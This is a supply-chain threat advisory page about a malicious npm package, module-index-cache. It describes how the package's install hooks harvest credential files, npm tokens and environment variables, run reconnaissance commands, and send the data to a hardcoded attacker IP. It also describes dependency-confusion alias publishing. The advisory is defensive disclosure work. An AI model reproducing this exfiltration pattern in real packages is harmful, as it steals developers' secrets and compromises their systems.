Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in module-index-cache (npm)

module-index-cache

Risk score

92

AI summary

Indexed incident for module-index-cache (npm).

Description

package.json declares preinstall, install, and postinstall hooks that all invoke install.js, so the payload runs unconditionally on npm install. install.js reads installer-side secrets and host data — /app/.env, /root/.npmrc, /home/node/.npmrc, /etc/npmrc, /app/.git/config, package.json, /proc/self/environ, and the full process.env (JSON-stringified, sliced to 15000 chars) — runs shell reconnaissance (id, hostname, whoami, ls, ps, find/grep for flag files), base64-encodes the bundle, and POSTs/PUTs it via http.request to the hardcoded endpoint http://154.57.164.76:30728/api/modules/ECT-839201. The tarball additionally ships publish-and-arm.sh and arm-aliases.sh, which document and automate publishing the package under aliases (curse-dependent, spectral-corsair, @spectral-corsair/cursed-modules) using npm:module-index-cache@1.0.2 redirection — explicitly labeled dependency-confusion and armed-alias-public-npm — to weaponize name confusion against private-registry consumers. A CTF/cover-story framing in comments does not change the installer impact: any machine that installs this package leaks its environment variables, npm auth tokens, dotenv contents, git configuration, and selected source/filesystem data to an attacker-controlled host.

Technical details

Affected versions

=1.0.1=1.0.0=1.0.2

Indicators

  • affected version=1.0.175%
  • affected version=1.0.075%
  • affected version=1.0.275%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents